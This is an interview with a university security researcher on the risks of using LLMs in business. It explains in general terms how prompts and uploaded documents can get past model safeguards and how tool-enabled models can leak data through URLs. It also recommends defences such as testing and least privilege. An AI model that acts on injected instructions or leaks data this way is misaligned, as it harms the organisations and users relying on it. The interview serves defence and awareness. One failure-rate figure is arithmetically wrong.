Even the best safeguards can’t stop LLMs from being fooled
In this Help Net Security interview, Michael Pound, Associate Professor at the University of Nottingham shares his insights on the cybersecurity risks associated with LLMs. He discusses common organizational mistakes and the necessary precautions for securing sensitive data when integrating LLMs into business operations.
Where do you see the biggest gaps in understanding or preparedness among CISOs and security teams when it comes to LLM use?
Many security professionals are – quite reasonably – not well versed in the underlying machine learning of LLMs. With past technologies this hasn’t been a big deal, but LLMs appear at a glance to be so powerful that it can mislead us into thinking they can’t be fooled. We can rush to build poorly thought out systems that end up breaking badly in the real world. Perhaps the most important thing is to remember that most generative AI, LLMs included, is probabilistic – it acts with randomness. This means it has a good chance of doing what you want, but the chance is rarely 100%.
Companies pitching AI solutions will talk about AI safeguards and alignment, to suggest that they have developed these models in a way in which they cannot break. In reality what this means is simply that a company has tried to train the LLM to reject a series of their own crafted malicious prompts. This reduces the chance of wayward behavior to a small value, but not to zero. Whether the LLM rejects a new and unseen prompt is something we cannot know for sure until it happens. Many examples exist of new and surprising ways to convince an LLM to do something bad.
What are the most common mistakes organizations make when feeding data into LLMs, especially regarding sensitive or proprietary information?
In the short term, companies should determine who is using these tools internally, what tools, and how they are being used. Many end users don’t realise that the queries they put into these models are uploaded to the cloud, and on some services these may end up in the training data. It’s easy to upload confidential client or company information without really considering the consequences. Recent models have more than enough parameters to learn your private data, and happily send it out to someone new. Productivity apps like those that handle email or calendar scheduling have access to this information by definition. Where is it going? Paid licenses for these tools typically have stronger usage controls and agreements in place – these are worth exploring.
In a similar way to historic SQL attacks, you must be very careful with uncontrolled user input. In testing you might ask an LLM the same question 100 times, the answers are different but consistent. Once released though, someone might ask a question in a slightly different way, or worse may purposefully prompt an LLM into malicious actions. With traditional code you could control for this, you could specify “if the input doesn’t match this exacting format, reject it”, but with LLMs it can be easy to write valid prompts that circumvent safeguards. The problem is actually much worse than with SQL. With SQL injection you could build in input sanitisation, parameterised queries and other mechanisms to prevent misuse, this is all but impossible for LLMs. Language models have no concept of a prompt vs the data they are using, it is all the same. This also means that uploaded documents or other files a user might provide are a source or malicious prompts, not just direct text input.
The risk increases now that LLMs are being provided access to tools – connections to other code and APIs. If an LLM can make web requests, there’s a chance of exfiltrating data through markdown or other urls. If an LLM can access any of your private data, that’s when the risk increases.
What kinds of defenses or mitigations are currently most effective in reducing the risk of LLM manipulation by adversarial inputs?
Most attempts to train models to avoid malicious prompts only last for a short time before someone works out a different strategy to avoid the safeguards. Your defense will depend on what you need the LLM to do. If you’re hoping to use it to summarise documents or retrieve data, then you want to carefully control what documents it can read to ensure they don’t contain malicious prompts.
If your AI is responding directly to user input – for example your customers, it’s inevitable that at some point someone is going to test the safeguards. You should test your LLMs regularly to see how they react, you could also use other functions to detect and weed out problematic prompts. In some ways the rules of SQL injection still apply – the principle of least privilege and role-based access control. Set your AI system up so that if the LLM can’t do damage even if it tries to.
What frameworks or guidelines do you recommend for safely integrating LLMs into business workflows?
Although it seems like we’ve been talking about LLMs for ages, they’re really only a few years old. Systems are new, popular libraries change regularly. Good options currently include Haystack, LangChain, and Llama-Index. Most of these are based around the idea of running your own local models, which is particularly useful if you’re worried about data privacy.
The biggest models require huge resources, but most modest models offer great performance on standard hardware. If you want to test models locally, try Ollama. If you want to re-train models, which can be a very effective way of controlling their output more precisely, have a look at Unsloth. Commercial products like Copilot, ChatGPT and Anthropic Claude are also reliable, at a higher cost.
As LLMs become more deeply integrated into infrastructure, what long-term or systemic cybersecurity concerns can we expect?
We are in an era where we are embedding LLMs into more and more systems, and people aren’t used to how these models differ from normal software development. Imaging writing code that some of the time simply doesn’t work, or outputs something unexpected. Even an almost perfect LLM that is correct 99.999% of the time will mathematically fail once every 1000 calls. We need to completely rethink how we build software to ensure that non-robust LLMs can be used in within robust systems. Just as we spent years closing SQL injection loopholes, with major breaches as recently as 2015, we will be spending a long time hearing about how an unexpected prompt caused an LLM to misbehave in disastrous ways.
Source link